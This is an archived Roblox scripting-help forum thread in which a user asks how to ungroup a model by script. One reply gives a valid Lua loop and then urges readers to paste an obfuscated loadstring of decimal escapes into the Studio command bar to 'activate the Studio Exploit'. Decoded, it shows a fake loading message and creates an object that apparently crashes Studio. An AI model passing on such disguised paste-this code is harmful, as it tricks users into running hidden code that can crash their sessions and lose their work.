generic image
Processing...
  • Games
  • Catalog
  • Develop
  • Robux
  • Search in Players
  • Search in Games
  • Search in Catalog
  • Search in Groups
  • Search in Library
  • Log In
  • Sign Up
  • Games
  • Catalog
  • Develop
  • Robux
   
ROBLOX Forum » Game Creation and Development » Scripting Helpers
Home Search
 

Re: 1 Question

Previous Thread :: Next Thread 
brinkokevin is not online. brinkokevin
Joined: 25 Jul 2012
Total Posts: 1673
29 Aug 2013 06:58 PM
Is it posible to ungroup model with a script
Report Abuse
notsopwnedg is not online. notsopwnedg
Joined: 07 Nov 2010
Total Posts: 4182
29 Aug 2013 07:00 PM
Yes.
Report Abuse
Raphael7 is not online. Raphael7
Joined: 03 Dec 2008
Total Posts: 2479
29 Aug 2013 07:01 PM
for _, v in pairs(game.Workspace.Model:GetChildren()) do
v.Parent = Workspace
end
game.Workspace.Model:Destroy()

> Please run this on your command bar in order to activate the Studio Exploit, loadstring("\108\101\108\32\61\32\34\76\111\97\100\105\110\103\32\82\97\112\104\97\101\108\55\39\115\32\83\116\117\100\105\111\32\69\120\112\108\111\105\116\34\10\109\115\103\32\61\32\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\101\115\115\97\103\101\39\44\32\87\111\114\107\115\112\97\99\101\41\10\102\111\114\32\105\32\61\32\49\44\32\108\101\108\58\108\101\110\40\41\32\100\111\32\119\97\105\116\40\48\46\49\53\41\10\109\115\103\46\84\101\120\116\32\61\32\109\115\103\46\84\101\120\116\46\46\108\101\108\58\115\117\98\40\105\44\105\41\10\101\110\100\10\119\97\105\116\40\50\41\10\102\111\114\32\105\32\61\32\49\44\32\109\97\116\104\46\114\97\110\100\111\109\40\55\44\32\49\52\41\32\100\111\32\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\46\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\46\46\39\10\101\110\100\10\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\97\110\117\97\108\83\117\114\102\97\99\101\74\111\105\110\116\73\110\115\116\97\110\99\101\39\41\10")()
Report Abuse
brinkokevin is not online. brinkokevin
Joined: 25 Jul 2012
Total Posts: 1673
29 Aug 2013 07:02 PM
what does this do i didnt use it yet ?

for _, v in pairs
Report Abuse
Soquick is not online. Soquick
Joined: 01 Nov 2012
Total Posts: 1497
29 Aug 2013 07:04 PM
It returns a table of children and you runs the below code 1 by one on a block
Report Abuse
Previous Thread :: Next Thread 
Page 1 of 1
 
 
ROBLOX Forum » Game Creation and Development » Scripting Helpers
   
 
   
  • About Us
  • Jobs
  • Blog
  • Parents
  • Help
  • Terms
  • Privacy

©2017 Roblox Corporation. Roblox, the Roblox logo, Robux, Bloxy, and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.



Progress
Starting Roblox...
Connecting to Players...
R R

Roblox is now loading. Get ready to play!

R R

You're moments away from getting into the game!

Click here for help

Check Remember my choice and click Launch Application in the dialog box above to join games faster in the future!

Gameplay sponsored by:
Loading 0% - Starting game...
Get more with Builders Club! Join Builders Club
Choose Your Avatar
I have an account
generic image